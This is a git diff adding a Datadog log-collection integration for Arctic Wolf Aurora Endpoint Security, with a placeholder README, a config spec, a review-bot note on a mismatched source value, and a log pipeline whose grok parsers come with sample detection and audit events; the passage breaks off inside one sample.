diff --git a/arctic_wolf_aurora_endpoint_security/CHANGELOG.md b/arctic_wolf_aurora_endpoint_security/CHANGELOG.md
new file mode 100644
index 0000000000000..204b53b346397
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/CHANGELOG.md
@@ -0,0 +1,4 @@
+# CHANGELOG - Arctic Wolf Aurora Endpoint Security
+
+
+
diff --git a/arctic_wolf_aurora_endpoint_security/README.md b/arctic_wolf_aurora_endpoint_security/README.md
new file mode 100644
index 0000000000000..74a355673a908
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/README.md
@@ -0,0 +1,64 @@ +# Agent Integration: Arctic Wolf Aurora Endpoint Security + +## Overview + +This integration monitors [Arctic Wolf Aurora Endpoint Security][4]. + +## Setup + +### Installation + +The Arctic Wolf Aurora Endpoint Security check is included in the [Datadog Agent][2] package. +No additional installation is needed on your server. + +### Configuration + +!!! Add list of steps to set up this integration !!! + +### Validation + +!!! Add steps to validate integration is functioning as expected !!! + +## Data Collected + +### Metrics + +Arctic Wolf Aurora Endpoint Security does not include any metrics. + +### Log Collection + + +1. Collecting logs is disabled by default in the Datadog Agent. Enable it in the `datadog.yaml` file with: + + ```yaml + logs_enabled: true + ``` + +2. Add this configuration block to your `arctic_wolf_aurora_endpoint_security.d/conf.yaml` file to start collecting your Arctic Wolf Aurora Endpoint Security logs: + + ```yaml + logs: + - type: file + path: /var/log/Arctic Wolf Aurora Endpoint Security.log + source: arctic_wolf_aurora_endpoint_security + service: + ``` + + Change the `path` and `service` parameter values and configure them for your environment. + +3. [Restart the Agent][3]. + +### Events + +The Arctic Wolf Aurora Endpoint Security integration does not include any events. + +## Troubleshooting + +Need help? Contact [Datadog support][1]. + +[1]: https://docs.datadoghq.com/help/ +[2]: https://app.datadoghq.com/account/settings/agent/latest +[3]: https://docs.datadoghq.com/agent/configuration/agent-commands/#start-stop-and-restart-the-agent +[4]: **LINK_TO_INTEGRATION_SITE** +[5]: https://github.com/DataDog/integrations-core/blob/master/arctic_wolf_aurora_endpoint_security/assets/service_checks.json + diff --git a/arctic_wolf_aurora_endpoint_security/assets/configuration/spec.yaml b/arctic_wolf_aurora_endpoint_security/assets/configuration/spec.yaml new file mode 100644 index 0000000000000..edad949cdd928 --- /dev/null 
+++ b/arctic_wolf_aurora_endpoint_security/assets/configuration/spec.yaml @@ -0,0 +1,9 @@ +name: Arctic Wolf Aurora Endpoint Security +files: +- name: arctic_wolf_aurora_endpoint_security.yaml + options: + - template: logs + example: + - type: file + path: /var/log/arctic_wolf_aurora_endpoint_security.log + source: arctic_wolf_aurora_endpoint_security diff --git a/arctic_wolf_aurora_endpoint_security/assets/dashboards/arctic_wolf_aurora_endpoint_security_overview.json b/arctic_wolf_aurora_endpoint_security/assets/dashboards/arctic_wolf_aurora_endpoint_security_overview.json new file mode 100644 index 0000000000000..e69de29bb2d1d diff --git a/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security.yaml b/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security.yaml new file mode 100644 index 0000000000000..d667f65b22c55 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security.yaml 
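Review bot: The example `source: arctic_wolf_aurora_endpoint_security` on the last line of this spec.yaml hunk uses underscores, while the pipeline filter in the logs asset added in the same commit is `query: source:arctic-wolf-aurora-endpoint-security`, so logs tagged with the documented value would not be routed into that pipeline unless a remap elsewhere handles it. If the hyphenated form is the intended key, the generated conf.yaml example should read `source: arctic-wolf-aurora-endpoint-security`. The README log-collection snippet repeats the underscore form (and a file path containing spaces, `/var/log/Arctic Wolf Aurora Endpoint Security.log`, unlike the spec's `/var/log/arctic_wolf_aurora_endpoint_security.log`), so both should agree with whichever value is kept.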
@@ -0,0 +1,1360 @@ +id: arctic-wolf-aurora-endpoint-security +metric_id: arctic-wolf-aurora-endpoint-security +backend_only: false +facets: + - groups: + - Web Access + name: Browser + path: http.useragent_details.browser.family + source: log + - groups: + - Web Access + name: Device + path: http.useragent_details.device.family + source: log + - groups: + - Web Access + name: OS + path: http.useragent_details.os.family + source: log + - groups: + - Geoip + name: City Name + path: network.client.geoip.city.name + source: log + - groups: + - Geoip + name: Continent Code + path: network.client.geoip.continent.code + source: log + - groups: + - Geoip + name: Continent Name + path: network.client.geoip.continent.name + source: log + - groups: + - Geoip + name: Country ISO Code + path: network.client.geoip.country.iso_code + source: log + - groups: + - Geoip + name: Country Name + path: network.client.geoip.country.name + source: log + - groups: + - Geoip + name: Subdivision ISO Code + path: network.client.geoip.subdivision.iso_code + source: log + - groups: + - Geoip + name: Subdivision Name + path: network.client.geoip.subdivision.name + source: log + - groups: + - Geoip + name: Destination City Name + path: network.destination.geoip.city.name + source: log + - groups: + - Geoip + name: Destination Continent Code + path: network.destination.geoip.continent.code + source: log + - groups: + - Geoip + name: Destination Continent Name + path: network.destination.geoip.continent.name + source: log + - groups: + - Geoip + name: Destination Country ISO Code + path: network.destination.geoip.country.iso_code + source: log + - groups: + - Geoip + name: Destination Country Name + path: network.destination.geoip.country.name + source: log + - groups: + - Geoip + name: Destination Subdivision ISO Code + path: network.destination.geoip.subdivision.iso_code + source: log + - groups: + - Geoip + name: Destination Subdivision Name + path: network.destination.geoip.subdivision.name + 
source: log +pipeline: + type: pipeline + name: Arctic Wolf Aurora Endpoint Security + enabled: true + filter: + query: source:arctic-wolf-aurora-endpoint-security + processors: + - type: date-remapper + name: Define `syslog.timestamp` as the official date of the log + enabled: true + sources: + - syslog.timestamp + - type: grok-parser + name: Parse common log format + enabled: true + source: message + samples: + - 'Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f3, Tenant Name: + TenantName, Event Type: AuditLog, Event Name: LoginFailure, Message: + {"data":[["Cylance Administrator Password","One-Time + Password"]],"clientIp":"163.116.205.118"}, User: John Carter + (john.carter@example.com), Eco Id: AqplNaZ7IyIQjDzBguyH5Ba=' + - 'Tenant Name: TenantName, Event Type: AuditLog, Event Name: + LoginFailure, Message: {"data":[["Cylance Administrator + Password","One-Time Password"]],"clientIp":"163.116.205.118"}, User: + John Carter (john.carter@example.com), Eco Id: + AqplNaZ7IyIQjDzBguyH5Ba=' + - 'Event Type: AuditLog, Event Name: LoginFailure, Message: + {"data":[["Cylance Administrator Password","One-Time + Password"]],"clientIp":"163.116.205.118"}, User: John Carter + (john.carter@example.com), Eco Id: AqplNaZ7IyIQjDzBguyH5Ba=' + - 'Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f4, Event Type: + AuditLog, Event Name: LoginFailure, Message: {"data":[["Cylance + Administrator Password","One-Time + Password"]],"clientIp":"163.116.205.118"}, User: John Carter + (john.carter@example.com), Eco Id: AqplNaZ7IyIQjDzBguyH5Ba=' + - "Event Name: OpticsCaeApiEvent, Device Name: SECURITYSERVER3, Zone + Names: (ZoneOne,ZoneTwo), Event Id: + d29ee101-a2a2-42f1-b9ab-7e4b18aeeef1, Severity: High, Description: + Test - API Sensor, High priority event, Instigating Process Name: + IReadCredentials.exe, Instigating Process Owner: + PENTEST//Administrator, Instigating Process ImageFileSha256: + E24F5A2B51EC1C260388348AF764B8794CE0566749F5801D024B7B422C63DC56, + Event Timestamp: 
2022-09-28T14:23:37.384Z, Event Received Timestamp: + 2022-09-28T14:24:30Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), + Detection Rule Id: be7403ca-a9f4-4aa7-ad6d-7c672bfa8fc9, Instigating + Process Command Line: IReadCredentials.exe, Instigating Process File + Path: c:\\apisensor\\ireadcredentials.exe, API DLL: Advapi32.dll, API + Function: CredEnumerateW, API Parameters: Unknown" + grok: + supportRules: PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: "parse_rule (Tenant ID: %{notSpace:tenant_id}, )?(Tenant Name: + %{PARSE_TILL_COMMA2:tenant_name}, )?(Event Type: + %{notSpace:event_type}, )?Event Name: %{PARSE_TILL_COMMA2:evt.name}, + %{data:additional_details}" + - type: category-processor + name: Categorise `service` based on `event_type` + enabled: true + categories: + - filter: + query: "@event_type:(AuditLog OR AppControl OR Device OR DeviceControl OR + ExploitAttempt OR ScriptControl OR Threat OR + ThreatClassification)" + name: desktop-events + - filter: + query: "@event_type:(OpticsCaeProcessEvent OR OpticsCaeFileEvent OR + OpticsCaeRegistryEvent OR OpticsCaeNetworkEvent OR + OpticsCaeMemoryEvent OR OpticsCaeDnsEvent OR OpticsCaeLogEvent OR + OpticsCaePowershellTraceEvent OR OpticsCaeWmiEvent OR + OpticsCaeComEvent OR OpticsCaeHttpEvent)" + name: detection-events + target: service + - type: category-processor + name: Categorize `service` based on `evt.name` for Aurora Protect API Sensor + Desktop Events + enabled: true + categories: + - filter: + query: "@evt.name:OpticsCaeApiEvent" + name: detection-events + target: service + - type: service-remapper + name: Define `service` as the official service of the log + enabled: true + sources: + - service + - type: pipeline + name: Processing Aurora Protect Desktop Application Control Events + enabled: true + filter: + query: "@event_type:AppControl" + processors: + - type: grok-parser + name: Parsing Aurora Protect 
Desktop Application Control Events + enabled: true + source: additional_details + samples: + - "Device Name: Unknown (test1), IP Address: (10.0.0.0), Action: Deny, + Action Type: PE File Change, File Path: , SHA256: + 56D1590A0D04771A1D5DBDEBEC7D4609A22B42085CEC07F0CF63222668FA5092, + Zone Names: (Windows Zone (Default)), Device Id: + 0929f443-2a56-46b3-bcfe-fc598da81d8b, Policy Name: Stage 3 - All + Threats AQT + Critical Exploit Prevention + Malicious Script + Prevention (Cylance Reference Policy)" + - "Device Name: WIN-7entSh64, IP Address: (192.168.119.125), Action: + Deny, Action Type: PEFileChange, File Path: + C:\\Users\\admin\\AppData\\Local\\Temp\\MyInstaller.exe, SHA256: + 04D4DC02D96673ECA9050FE7201044FDB380E3CFE0D727E93DB35A709B45EDAA), + Zone Names: (Script Test,Server Test)" + - "Device Name: WIN-7entSh64, IP Address: (192.168.119.125), Action: + Deny, Action Type: PEFileChange, File Path: + \\\\shared1\\psexec.exe, SHA256: + F8DBABDFA03068130C277CE49C60E35C029FF29D9E3C74C362521F3FB02670D5), + Zone Names: (Script Test,Server Test)" + grok: + supportRules: PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_appcontrol_rule Device Name: + %{PARSE_TILL_COMMA2:device_name}, IP Address: + %{notSpace:ip_addresses:array("()",",")}, Action: + (%{word:action})?, Action Type: %{PARSE_TILL_COMMA2:action_type}, + File Path: %{PARSE_TILL_COMMA2:file_path}, SHA256: + (%{notSpace:sha256})?, Zone Names: %{data:zone_names}(, Device Id: + (%{notSpace:device_id})?)?(, Policy Name: %{data:policy_name})?' 
+ - type: pipeline + name: Processing Aurora Protect Desktop Audit Events + enabled: true + filter: + query: "@event_type:AuditLog" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Audit Events + enabled: true + source: additional_details + samples: + - 'Message: {"data":[["Cylance Administrator Password","One-Time + Password"]],"clientIp":"163.116.205.115"}, User: John Carter + (john.carter@example.com), Eco Id: AqplNaZ7IyIQjDzBguyH5Ba=' + - "Message: Policy Assigned: Focus; Devices: DESKTOP-Q401L6B, User: + John Carter (john.carter@example.com)" + - 'Message: + {"Enable":true,"Siem":"Other","UseSsl":false,"ServerAddress":"103.108.207.59","ServerPort":"9809","Protocol":"tcp","Severity":7,"Facility":16,"TenantIdentifierLogging":0,"EnableForAppControl":true,"EnableForAuditLog":true,"EnableForDevice":true,"EnableForExploitAttempt":true,"EnableForDeviceControl":true,"EnableForOptics":true,"EnableForThreat":true,"EnableForThreatClassification":true,"EnableForScriptControl":true,"EnableForMobileAlerts":true,"EnableForNetworkThreats":true,"EnableForDirectorySync":false,"EnableForAvert":true,"EnableForRiskAssessment":false,"EnableMessagesOver2KB":true,"EnableForCloudWorkload":false,"CustomToken":"","TenantPreferredNotificationEmails":null}, + User: John Carter (john.carter@example.com)' + - "Message: Device: IT’s MacBook Air was auto assigned to Zone: Mac + Zone (Default); Policy Changed: 'Default' to 'Stage 1 - Threat + Monitoring (Cylance Reference Policy)', User:" + grok: + supportRules: PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + matchRules: "parse_audit_rule Message: %{PARSE_TILL_COMMA:message}, User:( + %{data:user})?(, Eco Id: %{notSpace:eco_id})?" 
+ - type: pipeline + name: Processing Aurora Protect Desktop Device Events + enabled: true + filter: + query: "@event_type:Device" + processors: + - type: grok-parser + name: Parsing Aurora Protect Device Desktop Event + enabled: true + source: additional_details + samples: + - "Device Names: (AssetTag-EID,IT’s MacBook Air,TEST-E7E9A2EH1), Zone Name: Test Devices, User: John Carter + (john.carter@example.com)" + - "Device Name: AssetTag-EID, Zone Names: (), Device Id: + b1f8e376-cee3-4319-a076-f587c51e68ab" + - "Device Names: (device1), User: John Carter (john.carter@example.com), + Zone Names: (Mac Zone (Default)), Device Ids: + (4ce89db7-c31f-4279-a979-35d78548a674)" + - "Device Message: Renamed: 'default' to 'Unknown'; Policy Changed: + 'Default' to 'IRVPolicy1'; Zones Added: 'IRV1', User: John Carter + (john.carter@example.com), Zone Names: (Windows Zone (Default)), + Device Id: 4af77c47-6b60-4807-ad95-ddabad5f4524" + - "Device Name: Unknown (test1), Last Scan: 11/25/2025 09:39:31, + Next Scan: 11/26/2025 06:53:24" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + PARSE_TILL_SINGLE_QUOTE %{regex("[^']*")} + matchRules: >- + parse_rule_device1 Device Message: Device: + %{PARSE_TILL_COMMA2:device_name}, User: %{PARSE_TILL_COMMA2:user}, + Zone Names: %{PARSE_TILL_COMMA:zone_names}, Device Id: + (%{notSpace:device_id})? + + parse_rule_device2 Device Message: Renamed: '%{PARSE_TILL_SINGLE_QUOTE:previous_device}' to '%{PARSE_TILL_SINGLE_QUOTE:device_name}'(; Policy Changed: '%{PARSE_TILL_SINGLE_QUOTE:previous_policy}' to '%{PARSE_TILL_SINGLE_QUOTE:policy_name}')?(; Zones Added: '%{PARSE_TILL_SINGLE_QUOTE:zones_added}')?, User: %{PARSE_TILL_COMMA2:user}(, Zone Names: %{PARSE_TILL_COMMA:zone_names})?(, Device Id: %{notSpace:device_id})? 
+ + parse_rule_device3 Device Names: %{data:device_names:array("()",",")}, Zone Name: %{PARSE_TILL_COMMA2:zone_name}, User: %{data:user} + + parse_rule_device4 Device Names: %{data:device_names:array("()",",")}(, Policy Name: %{PARSE_TILL_COMMA2:policy_name})?, User: %{PARSE_TILL_COMMA2:user}(, Zone Names: %{data:zone_names})?(, Device Ids: %{notSpace:device_ids:array("()",",")})? + + parse_rule_device5 Device Name: %{PARSE_TILL_COMMA2:device_name}, Agent Version: %{PARSE_TILL_COMMA2:agent_version}, IP Address: %{notSpace:ip_addresses:array("()",",")}, MAC Address: %{notSpace:mac_addresses:array("()",",")}, Logged On Users: %{data:logged_on_users}, OS: %{PARSE_TILL_COMMA2:os}(, Kernel Version: %{PARSE_TILL_COMMA2:kernel_version})?(, Optics Version: %{PARSE_TILL_COMMA2:optics_version})?(, Zone Names: %{data:zone_names})? + + parse_rule_device6 Device Name: %{PARSE_TILL_COMMA2:device_name}, Last Scan: %{data:last_scan}(, Next Scan: %{data:next_scan})? + + parse_rule_device7 Device Name: %{data:device_name}(, Zone Names: %{data:zone_names})?(, Device Id: (%{notSpace:device_id})?)? 
+ - type: pipeline + name: Processing Aurora Protect Desktop Device Control Events + enabled: true + filter: + query: "@event_type:DeviceControl" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Device Control Events + enabled: true + source: additional_details + samples: + - "Device Name: Test_Device_1, External Device Type: USBDrive, External Device + Vendor ID: 090B, External Device Name: USB Flash DISK USB Device, + External Device Product ID: 1001, External Device Serial Number: + 1408033910001642, Zone Names: (Windows Zone (Default)), Device Id: + cf753b5b-6ce6-4648-b2df-a827d3560b6a, Policy Name: Stage 3 - All + Threats AQT + Critical Exploit Prevention + Malicious Script + Prevention (Cylance Reference Policy)" + - "Device Name: Test_Device_1, External Device Type: USBDrive, External + Device Vendor ID: 1953, External Device Name: Generic USB Drive - + 2017/02/16-01, External Device Product ID: 0202, External Device + Serial Number: 575833314133343210041246, Zone Names: + (test_zone_02)" + grok: + supportRules: PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: "parse_device_control_rule Device Name: + %{PARSE_TILL_COMMA2:device_name}, External Device Type: + (%{notSpace:external_device_type})?, External Device Vendor ID: + (%{notSpace:external_device_vendor_id})?, External Device Name: + %{PARSE_TILL_COMMA2:external_device_name}, External Device Product + ID: (%{notSpace:external_device_product_id})?, External Device + Serial Number: (%{notSpace:external_device_serial_number})?, Zone + Names: %{data:zone_names}(, Device Id: %{notSpace:device_id})?(, + Policy Name: %{data:policy_name})?" 
+ - type: pipeline + name: Processing Aurora Protect Desktop Memory Protection Events + enabled: true + filter: + query: "@event_type:ExploitAttempt" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Memory Protection Events + enabled: true + source: additional_details + samples: + - "Device Name: Unknown (test1), IP Address: (10.0.0.0), Action: Terminated, + Process ID: 18280, Process Name: SearchProtocolHost.exe, User + Name: admin, Violation Type: Direct System Calls, Zone Names: (Windows + Zone (Default)), Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8t, + Policy Name: Stage 3 - All Threats AQT + Critical Exploit + Prevention + Malicious Script Prevention (Cylance Reference + Policy)" + - "Device Name: WIN-7entSh64, IP Address: (192.168.119.125), Action: + Blocked, Process ID: 3804, Process Name: C:\\AttackTest64.exe, + User Name: admin, Violation Type: LSASS Read, Zone Names: (Script + Test,Server Test), Device ID: + e378dacb-9324-453a-b8c6-5a8406952192" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_memory_protection_rule Device Name: + %{PARSE_TILL_COMMA2:device_name}, IP Address: + %{notSpace:ip_addresses:array("()",",")}, Action: + (%{notSpace:action})?, Process ID: (%{notSpace:process_id})?, + Process Name: %{PARSE_TILL_COMMA2:process_name}, User Name: + %{PARSE_TILL_COMMA2:usr.name}, Violation Type: + %{PARSE_TILL_COMMA2:violation_type}, Zone Names: + %{data:zone_names}(, Device Id: (%{notSpace:device_id})?)?(, + Policy Name: %{data:policy_name})?' 
+ - type: pipeline + name: Processing Aurora Protect Desktop Script Control Events + enabled: true + filter: + query: "@event_type:ScriptControl" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Script Control Events + enabled: true + source: additional_details + samples: + - "Device Name: Unknown (test1), File Path: c:/test1/test2, SHA256: + FEA0867AE0769D8858FFD94EA93EFBFE5C4531DB8CA75719D42BF074FE22F906, + Status: Unscored, Interpreter: Jscript, Interpreter Version: + 10.0.22621.5982, Zone Names: (Windows Zone (Default)), User Name: user1 + , Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8b, Policy Name: + Stage 3 - All Threats AQT + Critical Exploit Prevention + + Malicious Script Prevention (Cylance Reference Policy)" + - "Device Name: test1, File Path: c:/test1/test2, SHA256: + fe9b64defd8bf214c7490aa7f35b495a79a95e81f8943ee279dc99998d3d3444, + Status: Unscored, Interpreter: PowershellConsole, Interpreter + Version: 10.0.22621.1 (WinBuild.160101.0803), Zone Names: (Windows + Zone (Default)), User Name: user1, Device Id: + 191c967b-264c-46c3-999b-94c071e2e790, Policy Name: Focus" + - "Device Name: test1, File Path: c:/test1/test2, SHA256: + fe9b64defd8bf214c7490aa7f35b495a79a95e81f8943ee279dc99998d3d3441, + Interpreter: PowershellConsole, Interpreter Version: 10.0.22621.1 + (WinBuild.160101.0803), Zone Names: (Windows Zone (Default)), User + Name: , Device Id: 191c967b-264c-46c3-999b-94c071e2e79u, Policy + Name: Focus" + - "Device Name: Fake_Device, File Path: + d:\\windows\\system32\\windowspowershell\\v2.1\\newlyMade.vbs, + SHA256: + FE9B64DEFD8BF214C7490BB7F35B495A79A95E81F8943EE279DC99998D3D3440, + Interpreter: active, Interpreter Version: 6.1.7600.16385 + (win7_rtm.090713-1255), Zone Names: (Script Test,Server Test), + Device ID: e378dacb-9324-453a-b8c6-5a8406952195, Policy Name: + Default" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 
"parse_script_control_rule Device Name: + %{PARSE_TILL_COMMA2:device_name}, File Path: + %{PARSE_TILL_COMMA2:file_path}, SHA256: (%{notSpace:sha256})?(, + Status: %{PARSE_TILL_COMMA2:script_control_status})?, Interpreter: + (%{notSpace:interpreter})?, Interpreter Version: + %{PARSE_TILL_COMMA2:interpreter_version}, Zone Names: + %{data:zone_names}(, User Name: %{PARSE_TILL_COMMA:user})?, Device + I(d|D): (%{notSpace:device_id})?, Policy Name: + %{data:policy_name}" + - type: pipeline + name: Processing of Aurora Protect Desktop Threat Events + enabled: true + filter: + query: "@event_type:Threat" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Threat Events + enabled: true + source: additional_details + samples: + - "Device Name: Fakedevice, IP Address: (10.0.0.0), File Name: file_1, Path: c:/test1/test2, Drive Type: + Internal Hard Drive, SHA256: + 1C7E66126306537A453D7A792978464AA8AD5AC2F34BD1FCCFFFE7E0B9C6D85A, + MD5: D2EBA7BA9D87AC9D902D39540C7854EA, Status: Quarantined, + Cylance Score: 100, Found Date: 11/18/2025 12:06:53 PM, File Type: + Executable, Is Running: False, Auto Run: False, Detected By: + FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: + True, Is Unique To Cylance: False, Threat Classification: Malware + - Trojan - msil/convagent, Device Id: + 3daa966a-3b70-4a5a-90fd-33aee165ea1a, Policy Name: Focus" + - "Device Name: Fake_Device, IP Address: (10.0.0.0), File Name: testfile, Path: c:/test/test1, Drive Type: + Internal Hard Drive, SHA256: + 93502C2277984F26EE5C0B7F74AA1045C5CF648F8511939CDAE130F051BCF7B4, + MD5: BA1D384701CD80CF80428F3729369584, Status: Default, Cylance + Score: 97, Found Date: 11/18/2025 12:48:16 PM, File Type: + Executable, Is Running: False, Auto Run: False, Detected By: + FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: + False, Is Unique To Cylance: False, Threat Classification: + UNCLASSIFIED, Device Id: 3daa966a-3b70-4a5a-90fd-33aee165ea1f, + Policy Name: Focus" + - 
"Device Name: Fake_Device, IP Address: (10.0.0.0), File Name: testfile, Path: c:/test/test1, Drive Type: + Internal Hard Drive, SHA256: + 780BB152049A5921FABBE0DE066B53C36BF45D895B60B1651E35C69052E6703D, + MD5: EDF913F2D9993F003E5FE25BE9A48929, Status: FileRemoved, + Cylance Score: 95, Found Date: 11/18/2025 12:37:25 PM, File Type: + Executable, Is Running: False, Auto Run: False, Detected By: + FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: + False, Is Unique To Cylance: False, Threat Classification: + UNCLASSIFIED, Device Id: 3daa966a-3b70-4a5a-90fd-33aee165ea1f, + Policy Name: Focus" + - "Device Name: Fake_Device, IP Address: (10.0.0.0), File Name: file_1, Path: c:/test/test1, Drive Type: + Internal Hard Drive, SHA256: + FD4BB08C311EB04165C7DE20F21B2A4BF78776ABAB859448976BDE951BC8F593, + MD5: 2E2D79BAF18F763D0059ED1149871D79, Status: Quarantined, + Cylance Score: 100, Found Date: 11/18/2025 2:42:14 PM, File Type: + Executable, Is Running: False, Auto Run: False, Detected By: + FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: + False, Is Unique To Cylance: False, Threat Classification: + UNCLASSIFIED, Device Id: 3daa966a-3b70-4a5a-90fd-33aee165ea1f, + Policy Name: Focus" + - "Device Name: SH-Win81-1, IP Address: (10.3.0.132), File Name: + virusshare_00fbc4cc4b42774b50a9f71074b79bd9, Path: + c:\\ruby\\host_automation\\test\\data\\test_files\\, Drive Type: + None, File Owner: SH-Win81-1\\Exampleuser, SHA256: + 1EBF3B8A61A7E0023AAB3B0CB24938536A1D87BCE1FCC6442E137FB2A7DD510B, + MD5: 1EBF3B8A61A7E0023AAB3B0CB24938536A1D87BCE1FCC6442E137FB2A7DD510A, Status: Unsafe, Cylance Score: 100, Found Date: 6/1/2015 + 10:57:42 PM, File Type: Executable, Is Running: False, Auto Run: + False, Detected By: FileWatcher, Zone Names: (Script Test,Server + Test), Is Malware: False, Is Unique to Cylance: False, Threat + Classification: File Unavailable" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} 
+ matchRules: 'parse_threat_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, IP + Address: %{notSpace:ip_addresses:array("()",",")}, File Name: + %{PARSE_TILL_COMMA2:file_name}, Path: + %{PARSE_TILL_COMMA2:file_path}, Drive Type: + %{PARSE_TILL_COMMA2:drive_type}(, File Owner: + %{PARSE_TILL_COMMA2:file_owner})?, SHA256: (%{notSpace:sha256})?, + MD5: (%{notSpace:md5})?, Status: (%{word:Status})?, Cylance Score: + (%{integer:cylance_score})?, Found Date: + %{PARSE_TILL_COMMA2:found_date}, File Type: + %{PARSE_TILL_COMMA2:file_type}, Is Running: (%{word:is_running})?, + Auto Run: (%{word:auto_run})?, Detected By: + (%{notSpace:detected_by})?, Zone Names: + %{PARSE_TILL_COMMA:zone_names}, Is Malware: (%{word:is_malware})?, + Is Unique (t|T)o Cylance: (%{word:is_unique_to_cylance})?, Threat + Classification: %{data:threat_classification}(, Device Id: + %{notSpace:device_id})?(, Policy Name: %{data:policy_name})?' + - type: category-processor + name: Category processor for `file_state` + enabled: true + categories: + - filter: + query: "@cylance_score:[1 TO 59]" + name: Abnormal + - filter: + query: "@cylance_score:[60 TO 100]" + name: Unsafe + target: file_state + - type: pipeline + name: Processing Aurora Protect Desktop Threat Classification Events + enabled: true + filter: + query: "@event_type:ThreatClassification" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Threat Classification Events + enabled: true + source: additional_details + samples: + - "Threat Class: Malware, Threat Subclass: Dropper, Threat Family: + injuke, SHA256: + 5B63698F6FC9FBEE366BD01AF6A383652B09FC1B136A3408EB4187FD3C12973B, + MD5: 30AD7FF97EEDC9D14F06F9A8C96DC065" + - "SHA256: + 1218493137321C1D1F897B0C25BEF17CDD0BE9C99B84B4DD8B51EAC8F9794F68, + Threat Classification: Malware - Worm - QuKart" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: >- + rule1 Threat Class: 
%{PARSE_TILL_COMMA2:threat_class}, Threat + Subclass: %{PARSE_TILL_COMMA2:threat_subclass}, Threat Family: + %{PARSE_TILL_COMMA2:threat_family}, SHA256: (%{notSpace:sha256})?, + MD5: (%{notSpace:md5})? + + rule2 SHA256: (%{notSpace:sha256})?, Threat Classification: %{data:threat_classification} + - type: pipeline + name: Processing Aurora Focus Process Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeProcessEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Process Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: ADMIN, Zone Names: (Windows Zone (Default)), Event + Id: 1ac592a3-357f-43b9-86f5-6f750f809a2a, Severity: Low, + Description: Application Shimming Persistence (MITRE), Instigating + Process Name: svchost.exe, Instigating Process Owner: NT + AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: + 949BFB5B4C7D58D92F3F9C5F8EC7CA4CEAFFD10EC5F0020F0A987C472D61C54A, + Event Timestamp: 2025-11-20T04:46:43.792Z, Event Received + Timestamp: 2025-11-20T04:46:51Z, Device Last Reported Users: + (admin\\test,Window Manager\\DWM-1,Window Manager\\DWM-2), Zone + Ids: (E79C47BC6292419DBD0AE117798FB353), Detection Rule Id: + 5e5b01a7-2bdf-49c9-a58b-82703706a84f, Instigating Process Command + Line: C:\\Windows\\system32\\svchost.exe -k + LocalSystemNetworkRestricted -p -s PcaSvc, Instigating Process + File Path: c:\\windows\\system32\\svchost.exe, Target Process + Name: sdbinst.exe, Target Process Owner: NT AUTHORITY//SYSTEM, + Target Process ImageFileSha256: + 7E6B42AF9D8B1E1A4EFDEEB152997C7C9BBFA010B2FCE65BEF29A2903819E0E6, + Device Id: 191c967b-264c-46c3-999b-94c071e2e790, Target Process + Command Line: C:\\Windows\\System32\\sdbinst.exe -m -bg, Target + Process File Path: c:\\windows\\system32\\sdbinst.exe" + - "Device Name: ADMIN, Zone Names: (Windows Zone (Default)), Event + Id: 72de5df2-5700-4977-9b66-580e6e697426, Severity: Low, + Description: Application Shimming 
